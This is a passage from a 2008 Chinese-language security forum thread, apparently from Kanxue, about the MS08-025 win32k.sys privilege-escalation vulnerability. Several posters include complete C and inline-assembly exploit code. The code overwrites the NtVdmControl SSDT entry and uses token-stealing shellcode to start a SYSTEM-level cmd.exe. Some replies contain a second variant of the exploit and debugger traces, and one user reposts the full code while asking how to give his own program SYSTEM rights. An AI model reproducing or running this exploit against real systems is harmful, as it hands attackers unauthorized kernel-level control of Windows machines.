vessial(xee) 雪币： 4536 活跃值： (902) 能力值： ( LV16，RANK：480 ) 在线值：发帖 28 回帖 126 粉丝 31 关注私信	vessial(xee) 11 2 楼 PS: 学习了一下内核漏洞利用感谢whitecell的大牛们的精典exploit 2008-4-14 19:33 0
NWMonster 雪币： 134 活跃值： (84) 能力值： ( LV5，RANK：60 ) 在线值：发帖 26 回帖 457 粉丝 8 关注私信	NWMonster 1 3 楼很强，谢谢，支持一个 2008-4-14 20:29 0
bwin 雪币： 200 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 2 回帖 183 粉丝 0 关注私信	bwin 4 楼学习了一下内核漏洞利用 2008-4-14 21:00 0
netwind 雪币： 10868 活跃值： (3282) 能力值： (RANK：520 ) 在线值：发帖 86 回帖 844 粉丝 26 关注私信	netwind 13 5 楼 SSDT 很多exploit用的覆盖SSDT执行shell ，但实际情况SSDT 有内存保护不可写不知道楼主是否尝试过改写SSDT 2008-4-14 21:08 0
amour 雪币： 250 活跃值： (16) 能力值： ( LV2，RANK：10 ) 在线值：发帖 8 回帖 102 粉丝 0 关注私信	amour 6 楼学习收藏之!! 2008-4-14 22:11 0
amour 雪币： 250 活跃值： (16) 能力值： ( LV2，RANK：10 ) 在线值：发帖 8 回帖 102 粉丝 0 关注私信	amour 7 楼 server 2003 sp1下提权失败 2008-4-14 22:35 0
vessial(xee) 雪币： 4536 活跃值： (902) 能力值： ( LV16，RANK：480 ) 在线值：发帖 28 回帖 126 粉丝 31 关注私信	vessial(xee) 11 8 楼看见上帖，大家提了一下，我以前也没有试过，于是现在自已尝试一下，没想到还真成功了，呵呵，谢谢大家的提醒：） MS08-025 win32k.sys NtUserFnOUTSTRING Privilege Escalation Exploit 另一种利用方式，通过覆盖SSDT表NtVdmControl的地址进行shellcode的执行 #include <stdio.h> #include <windows.h> typedef LONG NTSTATUS; typedef NTSTATUS (NTAPI PNTALLOCATE)(HANDLE ProcessHandle, PVOID BaseAddress, ULONG ZeroBits, PULONG RegionSize, ULONG AllocationType, ULONG Protect ); typedef NTSTATUS (NTAPI ZWVDMCONTROL)(ULONG, PVOID); void ErrorQuit(char msg) { printf("%s:%x\n", msg, GetLastError()); ExitProcess(0); } ZWVDMCONTROL ZwVdmControl=NULL; OSVERSIONINFOEX OsVersionInfo; _declspec(naked) int ShellCode() { if ( OsVersionInfo.dwMinorVersion == 1 ) { __asm { nop nop nop nop nop nop mov eax,0xFFDFF124 // eax = KPCR (not 3G Mode) Mov eax,[eax] mov esi,[eax+0x220] mov eax,esi searchXp: mov eax,[eax+0x88] sub eax,0x88 mov edx,[eax+0x84] cmp edx,0x4 // Find System Process jne searchXp mov eax,[eax+0xc8] // 获取system进程的token mov [esi+0xc8],eax // 修改当前进程的token ret 8 } } if ( OsVersionInfo.dwMinorVersion == 2 ) { __asm { nop nop nop nop nop nop mov eax,0xFFDFF124 // eax = KPCR (not 3G Mode) Mov eax,[eax] mov esi,[eax+0x220] mov eax,esi search2003: mov eax,[eax+0x98] sub eax,0x98 mov edx,[eax+0x94] cmp edx,0x4 // Find System Process jne search2003 mov eax,[eax+0xd8] // 获取system进程的token mov [esi+0xd8],eax // 修改当前进程的token ret 8 } } } void InitTrampoline() { PNTALLOCATE NtAllocateVirtualMemory; LPVOID addr = (LPVOID)3; DWORD dwShellSize=0x1000; unsigned char trampoline[]="\x68\x00\x00\x00\x00" //push 0x0 "\xc3"; // retn NtAllocateVirtualMemory = (PNTALLOCATE) GetProcAddress(GetModuleHandle("ntdll.dll"),"NtAllocateVirtualMemory"); if( !NtAllocateVirtualMemory ) exit(0); NtAllocateVirtualMemory( (HANDLE)-1, &addr, 0, &dwShellSize, MEM_RESERVE\|MEM_COMMIT\|MEM_TOP_DOWN, PAGE_EXECUTE_READWRITE ); if( (PULONG)addr ) { printf("\n[++] Error Allocating memory\n"); exit(0); } (PULONG)(trampoline+1)=(PULONG)ShellCode; memcpy(NULL,trampoline,sizeof(trampoline)-1); } int Callback_Overview() { printf("\n"); printf("===================================================================== \n"); printf("\t\tMicrosoft Windows XP SP2 - MS08-025 - \n"); printf("\twin32k.sys NtUserFnOUTSTRING Privilege Escalation Exploit \n"); printf("===================================================================== \n"); printf("+ References:\n"); printf(" http://www.microsoft.com/technet/security/bulletin/ms08-025.mspx\n"); printf(" http://hi.baidu.com/vessial\n\n"); return 1; } void GetFunction() { HANDLE hNtdll,hNtos; hNtdll = LoadLibrary("ntdll.dll"); if(hNtdll == NULL) ErrorQuit("LoadLibrary failed.\n"); ZwVdmControl = (ZWVDMCONTROL)GetProcAddress(hNtdll, "ZwVdmControl"); if(ZwVdmControl == NULL) ErrorQuit("GetProcAddress failed.\n"); FreeLibrary(hNtdll); } int main(int argc, char *argv) { //PULONG PntVdmControl=0x805F0DB0; PULONG PntVdmControl=0x80502460; //通过(PULONG)(KeServiceDescriptorTalbe)+0x10c4获得 STARTUPINFOA stStartup; PROCESS_INFORMATION pi; Callback_Overview(); GetFunction(); RtlZeroMemory( &OsVersionInfo, sizeof(OsVersionInfo) ); OsVersionInfo.dwOSVersionInfoSize = sizeof(OSVERSIONINFOEX); GetVersionEx ((OSVERSIONINFO ) &OsVersionInfo); if ( OsVersionInfo.dwMajorVersion != 5 ) { printf( "Not NT5 system\n" ); ExitProcess( 0 ); } //Get Operatiny System Version InitTrampoline(); SendMessageW( GetDesktopWindow(), WM_GETTEXT, 0x80000000, (char)PntVdmControl ); SendMessageW( GetDesktopWindow(), WM_GETTEXT, 0x80000000, (char)PntVdmControl+2);//覆盖NtVdmControl所在的SSDT表，覆盖后结果为0x0 printf("\n[+] Executing Shellcode...\n"); ZwVdmControl(0, NULL);//这里就是call 0x0了，跳转执行我们的shellcode,哈哈：） GetStartupInfo( &stStartup ); CreateProcess( NULL, "cmd.exe", NULL, NULL, TRUE, NULL, NULL, NULL, &stStartup, &pi ); //此时创建的cmd.exe是SYSTEM权限 printf("[+] Exiting...\n"); return TRUE; } 我在XP测试成功，下面的第一个cmd是SYSTEM权限，这是我们提权后的，一个cmd是test权限上传的附件： ms08025.JPG （86.35kb，1028次下载） 2008-4-15 00:31 0
vessial(xee) 雪币： 4536 活跃值： (902) 能力值： ( LV16，RANK：480 ) 在线值：发帖 28 回帖 126 粉丝 31 关注私信	vessial(xee) 11 9 楼我的是windows 2003 SP2,没有作SP1的系统判断你可以先看一下SP1的EPROCESS的数据结构和偏移是否正确，再改一下shellcode，应该没有问题。 2008-4-15 00:35 0
netwind 雪币： 10868 活跃值： (3282) 能力值： (RANK：520 ) 在线值：发帖 86 回帖 844 粉丝 26 关注私信	netwind 13 10 楼我这里一写SSDT就蓝,把SSDT写保护去掉能执行shell 不过ret 8返回时又出错了我是申请块内存地址为0x8 此地址开始放入shell 然后用0x8 覆盖SSDT里的函数这样就不行? #include <stdio.h> #include <windows.h> #include <stdlib.h> #include "setshell.h" #define NTSTATUS int typedef NTSTATUS (NTAPI ZWALLOCATEVIRTUALMEMORY)(HANDLE, PVOID , ULONG, PULONG, ULONG, ULONG); ZWALLOCATEVIRTUALMEMORY ZwAllocateVirtualMemory; int main(int argc,char argv[]) { PVOID ZwVdmControl = NULL; DWORD HookAddress =0x8725f868;// 0x80504d70;//0x80502460;//0x805faad2; //ntvdmcontrol //这里要改掉 DWORD HookAddress1 = 0x8725f866;// 就是HookAddress-2 //相应的也该掉 PVOID ShellCodeMemory = (PVOID)0x8; //Shellcode的地址 DWORD MemorySize = 0x1000; PROCESS_INFORMATION pi; STARTUPINFOA stStartup; HINSTANCE hNtdll; hNtdll = LoadLibrary("ntdll.dll"); ZwAllocateVirtualMemory =(ZWALLOCATEVIRTUALMEMORY)GetProcAddress(hNtdll, "ZwAllocateVirtualMemory"); ZwVdmControl = GetProcAddress( LoadLibrary("ntdll.dll"), "ZwVdmControl" ); printf( " Create execute environment ... " ); ZwAllocateVirtualMemory( (HANDLE)-1, &ShellCodeMemory, 0, &MemorySize, MEM_RESERVE\|MEM_COMMIT\|MEM_TOP_DOWN, PAGE_EXECUTE_READWRITE ); printf( "Ok!\n" ); memset( ShellCodeMemory, 0x90, MemorySize ); SetShellCodeToMemory( (PVOID)((DWORD)ShellCodeMemory + 0x8) ); CHAR b[1000]; DWORD saddr=0x8; ::SendMessageW(::GetDesktopWindow() , WM_SETTEXT , 1 , (ULONG)&saddr ); ::SendMessageW(::GetDesktopWindow() , WM_GETTEXT , 0x80000000 ,HookAddress); saddr=0; ::SendMessageW(::GetDesktopWindow() , WM_SETTEXT , 1 , (ULONG)&saddr ); ::SendMessageW(::GetDesktopWindow() , WM_GETTEXT , 0x80000000 , HookAddress1); _asm { xor ecx,ecx push ecx push ecx mov eax, ZwVdmControl call eax } GetStartupInfo( &stStartup ); CreateProcess( NULL, "cmd.exe", NULL, NULL, TRUE, NULL, NULL, NULL, &stStartup, &pi ); return 0; } //setshell.h VOID SetShellCodeToMemory( PVOID ShellCodeMemory ) { OSVERSIONINFOEX OsVersionInfo; RtlZeroMemory( &OsVersionInfo, sizeof(OsVersionInfo) ); OsVersionInfo.dwOSVersionInfoSize = sizeof(OSVERSIONINFOEX); GetVersionEx ((OSVERSIONINFO ) &OsVersionInfo); if ( OsVersionInfo.dwMajorVersion != 5 ) { printf( "Not NT5 system\n" ); ExitProcess( 0 ); return; } if ( OsVersionInfo.dwMinorVersion == 1 ) { __asm { call CopyXpShellCode nop nop nop nop nop nop mov eax,0xFFDFF124 // eax = KPCR (not 3G Mode) Mov eax,[eax] mov esi,[eax+0x220] mov eax,esi searchXp: mov eax,[eax+0x88] sub eax,0x88 mov edx,[eax+0x84] cmp edx,0x4 // Find System Process jne searchXp mov eax,[eax+0xc8] // 获取system进程的token mov [esi+0xc8],eax // 修改当前进程的token ret 8 CopyXpShellCode: pop esi mov edi, ShellCodeMemory lea ecx, CopyXpShellCode sub ecx, esi cld rep movsb } } } 2008-4-15 03:27 0
火影雪币： 332 活跃值： (30) 能力值： ( LV12，RANK：460 ) 在线值：发帖 24 回帖 141 粉丝 1 关注私信	火影 11 11 楼学习之 2008-4-15 08:47 0
vessial(xee) 雪币： 4536 活跃值： (902) 能力值： ( LV16，RANK：480 ) 在线值：发帖 28 回帖 126 粉丝 31 关注私信	vessial(xee) 11 12 楼那你得用softice跟一下，看是在哪儿出的错。 2008-4-15 09:02 0
cvcvxk 雪币： 8835 活跃值： (2404) 能力值： ( LV12，RANK：760 ) 在线值：发帖 125 回帖 3095 粉丝 236 关注私信	cvcvxk 10 13 楼用shellcode创建个调用门不就可以随时进ring0了么~ 2008-4-15 12:03 0
netwind 雪币： 10868 活跃值： (3282) 能力值： (RANK：520 ) 在线值：发帖 86 回帖 844 粉丝 26 关注私信	netwind 13 14 楼我在虚拟机调试我这里的xp不能写SSDT 先去掉内存写保护才可以为什么有的机器可以写SSDT 有的却不可以去掉写保护后 shell执行完返回出错了， kd> 00000039 8986c8000000 mov dword ptr [esi+0C8h],eax 0000003f c20800 ret 8 00000042 90 nop 00000043 90 nop 00000044 90 nop 00000045 90 nop 00000046 90 nop 00000047 90 nop kd> ba e1 3f kd> g Breakpoint 2 hit 0000003f c20800 ret 8 kd> t //执行完ret 8 返回 nt!KiFastCallEntry+0xf8: 8053d808 8be5 mov esp,ebp kd> g //这里就走不了了 Access violation - code c0000005 (!!! second chance !!!) 00007d70 ?? ??? 加调用门？老v把代码放出来大家学习啊 2008-4-15 12:39 0
NIXIANG 雪币： 200 能力值： (RANK：10 ) 在线值：发帖 1 回帖 13 粉丝 0 关注私信	NIXIANG 15 楼学习。。。。 2008-4-15 15:07 0
combojiang 雪币： 321 活跃值： (271) 能力值： ( LV13，RANK：1050 ) 在线值：发帖 44 回帖 765 粉丝 56 关注私信	combojiang 26 16 楼学习。 2008-4-15 20:13 0
achillis 雪币： 7651 活跃值： (523) 能力值： ( LV9，RANK：610 ) 在线值：发帖 32 回帖 2032 粉丝 47 关注私信	achillis 15 17 楼好像内存比较小的时候不会开启SSDT的写保护,不知道14楼说的是不是因为这个 2008-4-16 16:27 0
walterwong 雪币： 160 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 44 回帖 110 粉丝 0 关注私信	walterwong 18 楼樓主你那個exploit如何compile呀? 我用vc 6.0 要加上什么.h檔? #include "stdafx.h" 可否不要呀? 2008-4-16 18:26 0
achillis 雪币： 7651 活跃值： (523) 能力值： ( LV9，RANK：610 ) 在线值：发帖 32 回帖 2032 粉丝 47 关注私信	achillis 15 19 楼那个头文件是建工程的时候自己生成的，可以不要。你对VC还不熟就来玩这种玩意... 2008-4-16 18:33 0
walterwong 雪币： 160 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 44 回帖 110 粉丝 0 关注私信	walterwong 20 楼為何我一run你的程式就立即restar 我是用vc6.0 compile xp sp2 繁中 2008-4-16 18:35 0
walterwong 雪币： 160 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 44 回帖 110 粉丝 0 关注私信	walterwong 21 楼那請問樓主那個程式應如何compile 應加上什么頭檔? 2008-4-16 18:38 0
nbgj 雪币： 200 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 8 回帖 22 粉丝 0 关注私信	nbgj 22 楼有点弄不明白,不过顶了 2008-4-17 09:18 0
walterwong 雪币： 160 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 44 回帖 110 粉丝 0 关注私信	walterwong 23 楼如何compile呀? http://tieba.baidu.com/f?ct=335675392&tn=baiduPostBrowser&sc=3662504648&z=357690591&pn=0&rn=50&lm=0&word=c%2B%2B#3662504648 2008-4-17 22:53 0
渗透雪币： 119 活跃值： (313) 能力值： ( LV2，RANK：10 ) 在线值：发帖 11 回帖 111 粉丝 0 关注私信	渗透 24 楼另一种形态！就如同峨眉与少林 2008-4-18 14:29 0
walterwong 雪币： 160 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 44 回帖 110 粉丝 0 关注私信	walterwong 25 楼 #include <stdio.h> #include <windows.h> typedef LONG NTSTATUS; typedef NTSTATUS (NTAPI PNTALLOCATE)(HANDLE ProcessHandle, PVOID BaseAddress, ULONG ZeroBits, PULONG RegionSize, ULONG AllocationType, ULONG Protect ); typedef NTSTATUS (NTAPI ZWVDMCONTROL)(ULONG, PVOID); void ErrorQuit(char msg) { printf("%s:%x\n", msg, GetLastError()); ExitProcess(0); } ZWVDMCONTROL ZwVdmControl=NULL; OSVERSIONINFOEX OsVersionInfo; _declspec(naked) int ShellCode() { if ( OsVersionInfo.dwMinorVersion == 1 ) { __asm { nop nop nop nop nop nop mov eax,0xFFDFF124 // eax = KPCR (not 3G Mode) Mov eax,[eax] mov esi,[eax+0x220] mov eax,esi searchXp: mov eax,[eax+0x88] sub eax,0x88 mov edx,[eax+0x84] cmp edx,0x4 // Find System Process jne searchXp mov eax,[eax+0xc8] // 获取system进程的token mov [esi+0xc8],eax // 修改当前进程的token ret 8 } } if ( OsVersionInfo.dwMinorVersion == 2 ) { __asm { nop nop nop nop nop nop mov eax,0xFFDFF124 // eax = KPCR (not 3G Mode) Mov eax,[eax] mov esi,[eax+0x220] mov eax,esi search2003: mov eax,[eax+0x98] sub eax,0x98 mov edx,[eax+0x94] cmp edx,0x4 // Find System Process jne search2003 mov eax,[eax+0xd8] // 获取system进程的token mov [esi+0xd8],eax // 修改当前进程的token ret 8 } } } void InitTrampoline() { PNTALLOCATE NtAllocateVirtualMemory; LPVOID addr = (LPVOID)3; DWORD dwShellSize=0x1000; unsigned char trampoline[]="\x68\x00\x00\x00\x00" //push 0x0 "\xc3"; // retn NtAllocateVirtualMemory = (PNTALLOCATE) GetProcAddress(GetModuleHandle("ntdll.dll"),"NtAllocateVirtualMemory"); if( !NtAllocateVirtualMemory ) exit(0); NtAllocateVirtualMemory( (HANDLE)-1, &addr, 0, &dwShellSize, MEM_RESERVE\|MEM_COMMIT\|MEM_TOP_DOWN, PAGE_EXECUTE_READWRITE ); if( (PULONG)addr ) { printf("\n[++] Error Allocating memory\n"); exit(0); } (PULONG)(trampoline+1)=(PULONG)ShellCode; memcpy(NULL,trampoline,sizeof(trampoline)-1); } int Callback_Overview() { printf("\n"); printf("===================================================================== \n"); printf("\t\tMicrosoft Windows XP SP2 - MS08-025 - \n"); printf("\twin32k.sys NtUserFnOUTSTRING Privilege Escalation Exploit \n"); printf("===================================================================== \n"); printf("+ References:\n"); printf(" http://www.microsoft.com/technet/security/bulletin/ms08-025.mspx\n"); printf(" http://hi.baidu.com/vessial\n\n"); return 1; } void GetFunction() { HANDLE hNtdll,hNtos; hNtdll = LoadLibrary("ntdll.dll"); if(hNtdll == NULL) ErrorQuit("LoadLibrary failed.\n"); ZwVdmControl = (ZWVDMCONTROL)GetProcAddress(hNtdll, "ZwVdmControl"); if(ZwVdmControl == NULL) ErrorQuit("GetProcAddress failed.\n"); FreeLibrary(hNtdll); } int main(int argc, char *argv) { //PULONG PntVdmControl=0x805F0DB0; PULONG PntVdmControl=0x80502460; //通过(PULONG)(KeServiceDescriptorTalbe)+0x10c4获得 STARTUPINFOA stStartup; PROCESS_INFORMATION pi; Callback_Overview(); GetFunction(); RtlZeroMemory( &OsVersionInfo, sizeof(OsVersionInfo) ); OsVersionInfo.dwOSVersionInfoSize = sizeof(OSVERSIONINFOEX); GetVersionEx ((OSVERSIONINFO ) &OsVersionInfo); if ( OsVersionInfo.dwMajorVersion != 5 ) { printf( "Not NT5 system\n" ); ExitProcess( 0 ); } //Get Operatiny System Version InitTrampoline(); SendMessageW( GetDesktopWindow(), WM_GETTEXT, 0x80000000, (char)PntVdmControl ); SendMessageW( GetDesktopWindow(), WM_GETTEXT, 0x80000000, (char)PntVdmControl+2);//覆盖NtVdmControl所在的SSDT表，覆盖后结果为0x0 printf("\n[+] Executing Shellcode...\n"); ZwVdmControl(0, NULL);//这里就是call 0x0了，跳转执行我们的shellcode,哈哈：） GetStartupInfo( &stStartup ); CreateProcess( NULL, "cmd.exe", NULL, NULL, TRUE, NULL, NULL, NULL, &stStartup, π ); //此时创建的cmd.exe是SYSTEM权限 printf("[+] Exiting...\n"); return TRUE; } 我把以上程式中的 CreateProcess( NULL, "cmd.exe", NULL, NULL, TRUE, NULL, NULL, NULL, &stStartup, π ); //此时创建的cmd.exe是SYSTEM权限改成自已的程式即把 cmd.exe改成a.exe為何這個a.exe不是SYSTEM權限還是一般用戶權限呢? 2008-4-21 23:45 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复